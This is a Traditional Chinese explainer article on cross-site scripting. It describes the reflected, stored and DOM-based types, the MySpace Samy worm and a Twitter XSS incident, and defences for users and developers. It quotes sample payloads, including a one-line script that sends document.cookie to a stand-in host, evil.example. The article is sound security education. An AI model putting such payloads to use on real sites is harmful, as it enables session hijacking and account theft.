XSS（跨網站指令碼攻擊）是什麼？

XSS 是什麼？簡單易懂的解釋

XSS 攻擊（Cross-Site Scripting，XSS attack）是一種常見的網站安全漏洞，通常指的是駭客透過 HTML 注入 在網頁中插入惡意的腳本（script）程式碼，讓使用者在瀏覽該網頁時，攻擊者的指令碼就在使用者的瀏覽器中執行​。由於這類攻擊會跨越不同網站的信任邊界進行指令碼(script)注入，因此稱為跨網站指令碼攻擊。值得注意的是，英文稱呼中的「Cross-Site Scripting」）縮寫為 XSS（使用 X 而非 C，是為了避免與樣式表 CSS 混淆​。XSS 攻擊在網路世界中非常普遍，長期以來被列為 OWASP 前十大網站安全風險之一​。

簡而言之，XSS 讓不懷好意的人有機會在別人的網站上偷偷執行自己的惡意程式碼。這意味著當受害者造訪遭植入惡意腳本的網站時，駭客所插入的script XSS程式（通常是 JavaScript）就會在受害者的瀏覽器中運行，進而達到攻擊目的，例如竊取使用者的帳號 cookie 資料、偽裝使用者身分進行操作，甚至在畫面上顯示釣魚訊息等等。

XSS 攻擊的種類：反射型、儲存型與 DOM 型

根據惡意腳本注入方式和存留位置的不同，Cross-Site Scripting XSS 攻擊主要分為三種類型：反射型、儲存型和 DOM 型。下面我們分別介紹每一種類型的 XSS 攻擊及其運作方式。

反射型 XSS 攻擊（Reflected XSS）

反射型 XSS 是最常見的 XSS 攻擊類型之一。這類攻擊通常將惡意腳本程式碼隱藏在網址參數中，當受害者點擊特殊構造的惡意連結時，伺服器會將惡意程式「反射」回瀏覽器並立即執行。例如，攻擊者可能在連結中加入類似 id=<script>alert(1);</script> 的參數​。當使用者一點擊該連結，嵌在 URL 中的惡意 <script> 程式就會被注入頁面並執行（這就是所謂的 script XSS 注入）。由於這種 URL 看起來非常可疑，攻擊者往往會利用社交工程誘騙受害者點擊，例如使用縮網址或編碼方式來隱藏其中的惡意內容​。反射型 XSS 攻擊的特徵是惡意腳本不會被儲存在目標網站的資料庫中，而是隨著請求即時觸發，一旦使用者不點擊惡意連結，攻擊就無法生效。

儲存型 XSS 攻擊（Stored XSS）

儲存型 XSS 又稱永久型 XSS，指攻擊者將惡意腳本代碼直接儲存在目標網站的伺服器上，例如留言板、論壇文章或使用者個人資訊欄位。當其他使用者瀏覽包含這段惡意腳本的頁面時，腳本會自動載入並在他們的瀏覽器中執行​。這種攻擊不需要受害者點擊特定連結，只要造訪受感染的頁面就會中招，因此危害範圍通常更大。經典例子是留言板功能：假設網站沒有對使用者輸入進行過濾，攻擊者在留言板發表留言時插入一段惡意的 JavaScript，例如 <script>alert("XSS");</script>。這段程式碼被後端直接存進資料庫，當其他使用者打開該留言板頁面時，這段腳本就會立刻在他們的瀏覽器中執行，可以用來竊取使用者的 Cookie 等敏感資訊​。由於儲存型 XSS 的惡意程式碼長期駐留在伺服器上，所有瀏覽相關頁面的用戶都可能受到影響，因此其危險性往往高於反射型 XSS。

DOM 型 XSS 攻擊（DOM-based XSS）

DOM 型 XSS 是發生在瀏覽器端（Client-Side）的一種 XSS 攻擊。此類攻擊不直接經由伺服器輸出惡意內容，而是利用網頁中的 JavaScript 程式在處理 DOM 時的漏洞，將不可信的資料寫入頁面，從而執行惡意腳本。換言之，攻擊者精心構造輸入，使頁面上原本的前端腳本在更新 DOM 節點時注入了惡意程式碼。DOM 型 XSS 和反射型類似，也常需要透過特殊連結引誘使用者點擊才能生效​。例如，攻擊者可能提供一個帶有惡意片段的 URL，其中包含一段看似無害的內容，但實際上會被前端腳本當作 HTML 插入頁面。或者利用圖像標籤的事件，如：<img src="#" onerror="alert(123)"> 這樣的程式碼片段​——當使用者瀏覽時，圖像載入失敗會觸發 onerror 裡的惡意腳本。由於 DOM 型 XSS 完全在用戶端發生，傳統的伺服器端防禦（如輸出轉義）可能無法檢測到，因此開發人員在撰寫前端程式時也需要特別小心處理來自 URL 或使用者輸入的資料。

XSS 攻擊實際案例

XSS 攻擊並非只是理論上的威脅，過去已發生過多起造成嚴重影響的XSS攻擊事件。以下列舉幾個著名的真實案例，加深讀者對 XSS 危害的認識：

• **社群網站 XSS 蠕蟲：**2005 年 MySpace 社群網站爆發了一起利用儲存型 XSS 的蠕蟲攻擊事件，稱為「Samy 蠕蟲」。攻擊者在自己的個人檔案中嵌入惡意腳本，使得任何瀏覽其個人頁面的用戶都自動在個人檔案中加入「Samy 是我的朋友」的訊息，並將攻擊者加為好友。由於該腳本會不停傳播，短短 20 小時內就有超過一百萬名用戶的帳戶受到影響​，成為當時傳播速度最快的網路蠕蟲之一。這起事件甚至導致作者本人遭到法律起訴，可見 XSS 攻擊的威力之大​。
• Twitter 自動轉推漏洞：XSS 攻擊也曾影響知名的社群平台 Twitter。2014 年，一名奧地利少年在測試如何在推文中顯示特殊符號時，意外發現 Twitter 的動態消息欄存在 XSS 漏洞。雖然他立即回報給 Twitter 官方，但另一位德國學生隨即利用該漏洞發佈了一條會自我轉推的推文。結果這條惡意推文在發布兩小時內就自動轉推了數十萬次，影響了數千個帳戶（包括《紐約時報》與 BBC 新聞等知名帳號）​。為了阻止攻擊蔓延，Twitter 被迫一度關閉整個動態消息(feed)功能進行處置。這個事件生動展示了 XSS 攻擊如何在短時間內造成大範圍影響。
• 留言板釣魚案例：許多留言板或論壇曾遭遇 XSS 攻擊，導致使用者被釣魚或帳號被盜取的事件。例如，某新聞網站的留言功能若未做輸入過濾，攻擊者可以發表一則包含惡意腳本的留言。其他讀者瀏覽該留言時，惡意腳本會自動在其瀏覽器中執行。攻擊者可以藉此竊取該讀者的登入 Cookie，進而冒充對方的身分登入網站，甚至在畫面中動態植入偽造的登入對話框來騙取使用者的帳號密碼。由於這類攻擊發生在受信任的網站上，使用者往往難以察覺自己受騙，導致個人資料在不知不覺中被盜走。

以上僅是幾個案例，實際上XSS 攻擊手法多種多樣，從社群平台到企業內部系統都曾淪為受害者。這些事件凸顯了防範 XSS 的重要性：一個小小的script XSS漏洞，都可能引發重大的資安風險。

XSS 攻擊如何運作？惡意腳本如何竊取資料

那麼，XSS 攻擊到底是如何運作的？從本質上講，攻擊者利用網站開發時的漏洞，讓惡意腳本能被注入網站的頁面內容中，並在使用者瀏覽時執行​。由於這段腳本是從受信任的網站伺服器傳送的，瀏覽器不會將其視為不明程式而加以阻擋，反而賦予它與該網站相同的權限。這意味著惡意腳本可以做到許多危險的事情，例如：

• 竊取身份憑證：攻擊者常用 XSS 來偷取使用者的身份驗證資料（如 session ID 或 cookies）。例如，一段惡意程式碼可以讀取 document.cookie 中的使用者登入憑證，然後透過影像請求將資料發送給攻擊者控制的伺服器。如下所示，一行簡單的程式就能把使用者的 Cookie 資料偷偷送出：
  <script> new Image().src = “http://evil.example/steal?cookie=” + document.cookie; </script>
  當受害者的瀏覽器執行上述 script XSS 程式碼時，會自動向 evil.example 發出一個帶有 Cookie 資料的請求。攻擊者隨即獲取使用者的身份令牌，便可冒充使用者進行未授權操作（如盜用帳號）。​
• 偽裝畫面進行詐騙：由於惡意腳本能夠修改瀏覽中的網頁內容，攻擊者可以利用 XSS 在頁面上顯示看似正常其實偽造的介面。例如彈出一個假的登入對話框，誘導使用者輸入帳號密碼。使用者以為是在該網站重新登入，實際上帳密已經透過 XSS 被發送給攻擊者。這類手法常用於釣魚詐騙，特別具有迷惑性。
• 在使用者環境執行任意操作：XSS 惡意程式碼還可以利用受害者帳戶的權限，在其瀏覽器裡執行各種操作。例如自動替使用者發表文章、傳送私訊、按讚特定內容，甚至更改使用者的個人資料等等。這類攻擊等同於駭客「操縱」了受害者的瀏覽器。某些網路蠕蟲就是藉此迅速擴散（如前述的 MySpace 蠕蟲會自動在受害者頁面插入惡意程式碼以傳播）。

總而言之，XSS 攻擊透過在受信任網站上下手，以使用者的瀏覽器為執行載體，達成各種不法目的。值得強調的是，XSS 本身無法直接入侵伺服器或資料庫，它的危險在於侵害使用者端的安全—然而一旦使用者的身份被盜用，間接對伺服器造成的威脅也不容小覷。

使用者如何自保：面對 XSS，我們該怎麼做？

了解了 XSS 攻擊的原理與威脅後，一般網路使用者該如何保護自己，避免成為攻擊的受害者？以下是幾點建議：

• 提高警覺，慎點可疑連結：許多 XSS 攻擊都是透過誘導使用者點擊特殊連結來觸發的。因此，務必對來源可疑或經過縮網址的連結提高警惕。在點擊陌生人發來的網址之前，先確認連結所屬的網域是否可信，必要時可以透過搜尋引擎或連結掃描工具檢查其安全性。如果連結看起來亂七八糟或包含大量奇怪字元（例如<script>），千萬別隨意點擊。
• 留意網站行為是否異常：在瀏覽網站時，如果突然出現非預期的對話框、要求重新登入的彈窗或跳轉至不相關的頁面，要特別小心。這可能是 XSS 攻擊在作怪。例如，你明明已經登入某網站，卻跳出一個看似該站的登入窗口要求輸入帳密，此時應該懷疑是釣魚陷阱。遇到類似情況，應直接關閉窗口，並手動登入該網站官方首頁確認帳號狀態。
• 避免在不可信網站輸入敏感資訊：當你造訪一個安全性存疑的網站時，儘量不要輸入帳號、密碼、信用卡號等敏感資料。即使該網站本身不是釣魚站，也有可能因為存在 XSS 漏洞而被植入釣魚表單。養成查看瀏覽器網址列的習慣，確認正在輸入資料的頁面真的是正牌網站的域名，而非看似相同的冒牌頁面。
• 保持瀏覽器和防毒軟體更新：現代瀏覽器會內建一定程度的 XSS 過濾或阻擋功能（例如檢測到常見的惡意 <script> 標籤時會發出警告或拒絕執行）。確保你的瀏覽器為最新版本，能獲得這些保護。另外，防毒軟體或瀏覽器的資安插件也可以偵測並攔截部分簡單的 XSS 攻擊嘗試，為您的瀏覽多添加一層保護。
• 使用內容隔離和腳本阻擋工具：對於具有一定技術背景的使用者，可以考慮使用像 NoScript 這樣的瀏覽器擴充套件，來預設阻擋所有第三方網站的腳本執行。雖然這類工具需要手動維護允許清單、略微影響瀏覽體驗，但在防範 XSS 上非常有效。另外，一些瀏覽器提供的「嚴格網站隔離」功能也能降低不同網站之間腳本攻擊的影響範圍。

總之，身為使用者應保持良好的網路安全習慣，對可疑情境多留個心眼。雖然最終修補漏洞的責任在網站開發者，但使用者的謹慎可以將不少攻擊苗頭扼殺在搖籃中。

開發者如何防範 XSS 攻擊？

如果您是網站開發者或管理者，防範 XSS 攻擊更是責無旁貸。在開發階段就應採取預防措施，將 XSS 風險降到最低。以下是幾項重要的防範對策：

• 嚴格輸入驗證：永遠不要信任用戶輸入的資料。對所有來自用戶的輸入（包括網址參數、表單提交內容、甚至 HTTP 標頭）進行過濾與驗證。可以設定只允許特定格式或字元集合，拒絕包含 <、> 等特殊符號的輸入，或將其轉譯為無害的編碼。這樣可以從源頭上減少惡意腳本進入系統的機會。
• 輸出內容轉義：在將用戶提供的內容輸出到網頁時，務必對特殊字元進行 HTML 跳脫(escape) 或編碼。也就是將 <>、"、' 等符號轉換為瀏覽器不會解讀為程式碼的實體（例如 < 和 >）。大部分現代的Web框架都有內建的輸出轉義功能，應確保在模板呈現階段啟用這些功能。例如在顯示用戶留言時，顯示<script>字樣應該只是純文字而不會真的被當成腳本執行。
• 善用安全開發框架或函式庫：盡量使用成熟的框架來構建網站，因為它們通常已考慮並預防了 XSS 等常見漏洞。例如，React、Angular 等前端框架會自動對綁定的資料做轉義處理；後端框架如 Django、Ruby on Rails 也內建了預防 XSS 的模板系統。不要自行發明輸出過濾的方法，而應該使用社群驗證過的安全函式庫（例如 OWASP 提供的 ESAPI 工具集）來協助防範。
• 實施內容安全政策（CSP）：內容安全政策是一種由瀏覽器執行的安全機制，透過設定 HTTP 響應頭，開發者可以定義允許被載入的資源來源。例如，可以設定只允許本站域名的腳本執行，禁止 inline script 或限制可嵌入的第三方框架等。正確部署 CSP 後，即使有 XSS 漏洞，瀏覽器也有機會攔截非法腳本的執行或資源載入，把攻擊影響降到最低。CSP 是一種深度防禦措施，為網站提供額外的安全層。
• 其他防禦細節：對於重要的認證資訊，設定 HttpOnly Cookie 標記，防止 JavaScript 在瀏覽器中讀取敏感 Cookie（即使發生 XSS，被盜的 Cookie 也無法被腳本存取）。此外，保持網站軟體和第三方套件的及時更新，修補已知的 XSS 漏洞；定期進行安全稽核與滲透測試，以發現潛在問題。若有條件，可部署 Web 應用防火牆 (WAF) 來即時偵測和阻擋可疑請求。

簡而言之，對開發者而言，防範 XSS 在於時刻保持安全意識並遵循最佳實務。將所有來自使用者的輸入視為不受信任的資料，並對其進行適當的處理，是關鍵中的關鍵。包括輸入過濾、輸出編碼、HTML 清理、設置 HttpOnly Cookie 和內容安全政策 (CSP) 等措施，都對緩解 XSS 漏洞可能造成的危害至關重要​。只有將這些防禦措施融入日常的開發流程中，才能有效預防 XSS 攻擊。

結論與行動建議

XSS（跨網站指令碼攻擊）看似只是插入一小段<script>程式碼，實則可能對網站和使用者造成巨大的危害。在本篇文章中，我們介紹了 XSS 攻擊的概念、類型、實際案例以及防範方法。對於一般網路使用者來說，瞭解XSS能提高安全意識，在遇到可疑情況時懂得保護自己；而對開發者而言，防範 XSS 更是網站安全的基本功。

最後，我們提供以下行動建議：

• 資安新手與一般使用者：請將今天學到的知識運用到日常上網習慣中。保持警惕，慎點連結，不隨意在陌生或可疑網站輸入敏感資訊。如發現常用網站出現異常行為，可主動向網站管理員回報。良好的安全習慣將大幅降低您遭受 XSS 攻擊(XSS attack) 的風險。
• 網站開發者與管理員：請定期檢視您的網站是否存在 XSS 等漏洞，落實輸入驗證、輸出轉義等防禦措施。將安全檢查納入開發與維運流程，例如使用自動化掃描工具檢測 XSS 漏洞，或參考 OWASP 安全指南加強防護。如果發現或接獲 XSS 漏洞通報，務必儘快修補並通知用戶採取必要的防護措施。

透過使用者與開發者雙方面的努力，我們可以大大降低 XSS 攻擊得逞的機會。記住，網路安全無小事，每一次對細節的留意都是在為自己的資訊資產加上一道保障。讓我們養成安全的上網習慣並建立安全的開發環境，遠離 XSS 等網路攻擊威脅，打造更安心的數位生活環境。